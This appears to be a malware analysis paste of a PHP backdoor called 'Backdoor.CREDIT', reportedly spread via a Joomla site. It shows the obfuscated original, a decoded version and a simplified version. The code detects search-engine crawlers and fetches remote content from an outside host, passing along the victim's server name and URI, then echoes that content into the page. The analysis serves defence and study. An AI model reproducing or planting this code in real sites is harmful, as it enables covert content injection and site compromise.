Backdoor.CREDIT

1. // As found being distributed on youtubejoomla.com
2.  
3. ${"\x47L\x4f\x42\x41\x4c\x53"}["\x63\x6b\x77\x70\x6b\x71\x78\x73s\x66"]="\x63\x74\x78";${"G\x4c\x4f\x42\x41\x4cS"}["wn\x67\x6df\x6b\x6e\x67\x72w\x74o"]="b_t";if(!defined("CR\x45DI\x54")){$kbaxkmdsyf="b_t";${"\x47\x4cO\x42AL\x53"}["\x73\x77\x6e\x74s\x74\x64\x6e\x75"]="\x62\x5f\x74";strstr(strtolower($_SERVER["\x48\x54TP\x5f\x55SER_AG\x45\x4e\x54"]),"g\x6fo\x67\x6c\x65\x62o\x74")?${${"\x47\x4c\x4fB\x41L\x53"}["s\x77\x6ets\x74\x64n\x75"]}="1":${${"\x47LO\x42A\x4c\x53"}["\x77\x6e\x67m\x66\x6b\x6e\x67\x72\x77t\x6f"]}="\x30";$oxfcrtil="\x62_t";strstr(strtolower($_SERVER["\x48T\x54\x50_U\x53\x45R\x5fAGE\x4eT"]),"bin\x67bot")?${$kbaxkmdsyf}="2":${${"\x47\x4c\x4fBA\x4c\x53"}["\x77\x6eg\x6d\x66k\x6e\x67r\x77\x74\x6f"]}=${$oxfcrtil};${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x63\x6b\x77\x70\x6bqx\x73\x73\x66"]}=stream_context_create(array("\x68\x74\x74p"=>array("\x74\x69\x6de\x6fut"=>3)));try{$fumlttu="c\x72edi\x74";$fnibihkfgx="\x63\x74x";${$fumlttu}=@file_get_contents("\x68\x74\x74\x70://\x77\x77w\x2emum\x73c\x61\x74\x73\x2e\x63o\x6d/\x62ro/".${${"\x47\x4cO\x42\x41L\x53"}["\x77ngm\x66\x6b\x6egr\x77\x74\x6f"]}."/".$_SERVER["S\x45RVE\x52\x5f\x4e\x41\x4d\x45"].$_SERVER["REQUE\x53T_\x55\x52\x49"],false,${$fnibihkfgx});}catch(Exception$e){}echo$credit;define("CR\x45DIT","\x63");}
4.  
5. // decoded
6.  
7. $GLOBALS["ckwpkqxssf"]="ctx";
8. $GLOBALS["wngmfkngrwto"]="b_t";
9.  
10. if(!defined("CREDIT")){
11.     $kbaxkmdsyf="b_t";
12.     $GLOBALS["swntstdnu"]="b_t";
13.     strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")
14.         ?${$GLOBALS["swntstdnu"]}="1" // sets $b_t to 1
15.         :${$GLOBALS["wngmfkngrwto"]}="0"; // sets $b_t to 0
16.     $oxfcrtil="b_t";
17.     strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"bingbot")
18.         ?${$kbaxkmdsyf}="2" // sets $b_t to 2
19.         :${$GLOBALS["wngmfkngrwto"]}=${$oxfcrtil}; // sets $b_t to itself
20.     ${$GLOBALS["ckwpkqxssf"]}=stream_context_create(array(
21.         "http"=>array("timeout"=>3)
22.     )); // sets $ctx to a stream context
23.     try{
24.         $fumlttu="credit";
25.         $fnibihkfgx="ctx";
26.         // will fetch url <path>/$b_t/<server name><request URI>
27.         ${$fumlttu}=@file_get_contents("http://www.mumscats.com/bro/".${$GLOBALS["wngmfkngrwto"]}."/".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"],false,${$fnibihkfgx});
28.     }catch(Exception$e){}
29.     echo$credit;define("CREDIT","c"); // defining CREDIT prevents attack from happening
30. }
31.  
32. // simplified
33.  
34. if(!defined("CREDIT")){
35.     $search_engine = 0;
36.     strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")
37.         ?$search_engine="1"
38.         :$search_engine="0";
39.     strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"bingbot")
40.         ?$search_engine="2"
41.         :$search_engine=$search_engine;
42.     $ctx=stream_context_create(array("http"=>array("timeout"=>3)));
43.     try{
44.         $credit=@file_get_contents("http://www.mumscats.com/bro/".$search_engine."/".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"],false,$ctx);
45.     }
46.     catch(Exception$e){}
47.     echo $credit;
48.     define("CREDIT","c");
49. }